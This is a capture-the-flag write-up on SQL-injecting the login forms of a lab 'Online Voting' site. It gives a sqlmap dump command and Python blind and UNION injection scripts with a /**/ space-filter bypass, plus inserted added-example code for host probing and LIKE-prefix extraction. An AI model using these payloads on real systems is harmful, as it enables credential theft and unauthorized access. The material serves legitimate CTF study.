Synopsis

Once we had mapped the network, I found a machine running an Apache server, so I decided to check it out. The web site offered ten different ways of authenticating, and its title was "Online Voting".

First flag

This one was easy: a simple nikto run against the website showed a flag in the HTTP response headers.

SQL Easy

We quickly understood that all 10 authentication forms were SQL-injectable. So let's try the first one (the easy one).
I ran sqlmap on it and was able to dump the whole users table:
sqlmap -u http://192.168.248.111/challenge1.php --form --batch -D DBchallenge1 -T users -C users --dump
The FLAG{...} was in one of the users' password fields. Well done!

Remember, each step had to be repeated on the 11 other IPs.
I grepped our nmap output for every server with port 80 open, then requested challenge1.php on each of them to check whether it existed. Once that was done, you had the 12 IPs you needed to focus on:
192.168.8.61
192.168.20.211
192.168.36.134
192.168.68.201
192.168.80.177
192.168.104.214
192.168.148.12
192.168.168.135
192.168.196.185
192.168.208.207
192.168.240.79
192.168.248.111
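The host-selection step above (port 80 open in the nmap output, then a probe for challenge1.php and a look at the headers for the nikto-style flag), as an added example that is not part of the original write-up. The nmap lines are constructed in the format of nmap -oG output, the function names are chosen here, and the live HTTP probe only runs when an -oG file is passed on the command line.

```python
#!/usr/bin/env python3
"""Added example: pick hosts with port 80 open out of nmap's grepable
output (-oG), then probe each one for challenge1.php and look for a
FLAG{...} value in the response headers.  SAMPLE_GNMAP is constructed
for the example and is not real scan output."""
import re
import sys

# Constructed sample in nmap -oG format (not real scan output).
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated
Host: 192.168.248.111 ()\tStatus: Up
Host: 192.168.248.111 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http//Apache httpd/
Host: 192.168.248.112 ()\tPorts: 22/open/tcp//ssh///, 80/closed/tcp//http///
Host: 192.168.8.61 ()\tPorts: 80/open/tcp//http///, 443/open/tcp//https///
Host: 192.168.8.62 ()\tPorts: 8080/open/tcp//http-proxy///
"""

FLAG_RE = re.compile(r"FLAG\{[^}]*\}")


def hosts_with_open_port(gnmap_text, port=80):
    """Return the unique IPs whose Ports: field lists <port>/open/tcp."""
    wanted = "%d/open/tcp" % port
    hosts = []
    for line in gnmap_text.splitlines():
        # only "Host: <ip> (<name>)  Ports: ..." lines carry port state
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        ip = line.split()[1]
        ports_field = line.split("Ports:", 1)[1]
        for entry in ports_field.split(","):
            if entry.strip().startswith(wanted) and ip not in hosts:
                hosts.append(ip)
    return hosts


def find_flag_in_headers(headers):
    """Return the first FLAG{...} found in any header value, or None."""
    for value in headers.values():
        m = FLAG_RE.search(value)
        if m:
            return m.group(0)
    return None


def probe(ip, path="challenge1.php"):
    """Fetch http://ip/path; return (status code, header flag or None)."""
    import requests  # only needed for the live probe
    r = requests.get("http://%s/%s" % (ip, path), timeout=5)
    return r.status_code, find_flag_in_headers(r.headers)


if __name__ == "__main__":
    live = len(sys.argv) > 1
    text = open(sys.argv[1]).read() if live else SAMPLE_GNMAP
    for ip in hosts_with_open_port(text):
        if live:
            status, flag = probe(ip)
            print(ip, status, flag or "-")
        else:
            print(ip)
```

Run it as `python3 find_hosts.py scan.gnmap` to probe a real scan; without an argument it only lists the hosts from the constructed sample.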

2nd SQL (blind)

On to the next authentication form. Since I already had all the usernames and passwords, I simply tried to log in normally. OK, it works, but no flag. So I guessed that, as in the first one, we needed to find a user whose password is the flag. Let's go then.
I tried sqlmap again, but it didn't work.
So, Python it is ^^.
First we need to find which user holds the flag; fortunately I had all the usernames from the first challenge:
  #!/usr/bin/env python3

  import requests
  import sys

  # usernames dumped from challenge1 with sqlmap, one per line in "users"
  users = [u for u in open("users").read().split("\n") if u]

  # Boolean-blind probe: the injected passwd value asks whether a password
  # starting with FLAG{ exists; "Login failed" in the response means no.
  for user in users:
      data = {'username': user,
              'passwd': """1' or passwd like 'FLAG{%}'""",
              'login': 'Login'}
      r = requests.post("http://%s/challenge2.php" % sys.argv[1], data=data)
      if "Login failed" not in r.text:
          print("[+] USER WITH FLAG = ", user)
          break
  else:
      print("[-] no user with a FLAG{ password found")
Well, Guillaume is our target; now we are going to get his password (the flag):
  #!/usr/bin/env python3

  import requests
  import sys

  CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"

  flag = 'FLAG{'
  # FLAG{ plus 32 characters = 37; the closing } is appended at the end
  while len(flag) < 37:
      for i in CHARSET:
          # the server's own closing quote terminates the LIKE pattern
          data = {'username': "Guillaume",
                  'passwd': """1' or passwd like '""" + flag + i + "%",
                  'login': 'Login'}
          r = requests.post("http://%s/challenge2.php" % sys.argv[1], data=data)
          if "Login failed" not in r.text:
              flag += i
              print(flag)
              break
      else:
          # no character matched: the charset is incomplete or the oracle changed
          sys.exit("[-] no candidate matched for prefix %r" % flag)
  print("[+] FLAG : " + flag.upper() + "}")
As you can see, I use the SQL LIKE operator to detect when a prefix of the flag is correct, which lets us retrieve the flag's characters one by one.
Each time the login returns a success response, we know we can append that character to the flag and restart the loop with the longer prefix. We stop when the flag reaches its expected length.

3rd SQL

This time the input is filtered. When the login fails, the web page shows us the SQL query it ran:


Thanks to that, we understand that the filter removes all spaces. One technique against that is to use the inline comment /**/ in place of each space, since the SQL parser treats it as a token separator. I don't know whether other techniques were possible, but I used a known user with a wrong password, a UNION injection, and the filter bypass to get this flag:
  #!/usr/bin/env python3

  import requests
  import sys

  CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"

  flag = "FLAG{"
  while len(flag) < 37:
      for i in CHARSET:
          # spaces are stripped by the filter, so /**/ stands in for every space;
          # the server's own closing quote terminates the LENGTH comparison
          u = ("http://" + sys.argv[1] + "/challenge3.php?username=Eugenia&password=dd'/**/union/**/"
               + "select/**/*/**/from/**/users/**/where/**/password/**/like/**/'" + flag + i + "%'/**/"
               + "and/**/LENGTH(password)='38&login=Login")
          if "Logged" in requests.get(url=u).text:
              flag += i
              print(flag)
              break
      else:
          sys.exit("[-] no candidate matched for prefix %r" % flag)
  print("FLAG: %s}" % flag.upper())
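The prefix-oracle loop behind challenges 2 and 3, written once as a reusable routine, as an added example that is not part of the original write-up. It takes an oracle callable that answers "does some password start with this prefix?", so the same loop drives either the boolean-blind login form or the UNION variant, and it also shows the space-stripping bypass as a payload rewrite. The target here is a constructed in-memory table standing in for the CTF server; the query shape (`... AND password='<input>'`), a MySQL backend with a case-insensitive collation, and the names like_escape, build_payload, no_space, extract_with_like, fake_oracle and recover_flag are all assumptions made for this example.

```python
#!/usr/bin/env python3
"""Added example: LIKE-prefix extraction as a generic routine driven by an
oracle callable, plus the /**/ space-filter bypass as a payload rewrite.
The "database" below is constructed for the example; nothing here talks to
the CTF server."""

CHARSET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"


def like_escape(prefix):
    """Escape LIKE wildcards so a literal _ or % in the secret is not a wildcard."""
    return prefix.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def build_payload(prefix, length):
    """Injected password value for an assumed query ... AND password='<here>'.
    The server's own closing quote terminates the LENGTH comparison."""
    return ("x' union select * from users where password like '%s%%' "
            "and LENGTH(password)='%d" % (like_escape(prefix), length))


def no_space(payload):
    """Bypass for a filter that strips spaces: /**/ is a valid MySQL token separator."""
    return payload.replace(" ", "/**/")


def extract_with_like(oracle, prefix, total_length, charset=CHARSET):
    """Recover the secret one character at a time.

    oracle(prefix) -> True when some password begins with prefix.
    Stops one short of total_length because the final character (} for a
    flag) is known; raises if no character in charset extends the prefix,
    instead of looping forever."""
    while len(prefix) < total_length - 1:
        for c in charset:
            if oracle(prefix + c):
                prefix += c
                break
        else:
            raise ValueError("no candidate for prefix %r; charset too small?" % prefix)
    return prefix


# --- constructed stand-in for the vulnerable application (assumption) -----
FAKE_USERS = {
    "Eugenia": "hunter2",
    "Guillaume": "FLAG{0123456789abcdef0123456789abcdef}",
}


def fake_oracle(prefix):
    """Simulates the boolean answer the login page gives to a LIKE injection.
    Assumes MySQL with a case-insensitive collation, so LIKE ignores case;
    that is why the original scripts uppercase the recovered flag."""
    p = prefix.lower()
    return any(pw.lower().startswith(p) for pw in FAKE_USERS.values())


def recover_flag(oracle=fake_oracle, total_length=38):
    """Drive the extractor from the known prefix FLAG{ and add the closing }."""
    body = extract_with_like(oracle, "FLAG{", total_length)
    return body + "}"


if __name__ == "__main__":
    print(no_space(build_payload("FLAG{A", 38)))
    print(recover_flag())
```

Against a real target the oracle is the function that sends the HTTP request and checks the response text, exactly as in the scripts above; the extractor itself does not change. Because a case-insensitive LIKE cannot distinguish `a` from `A`, the recovered value is only correct up to case, which is the same limitation the original scripts accept.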


I didn't have time to continue with the other SQL injections, but most of the other teams hadn't protected those flags, so I was able to score a lot of points. ^^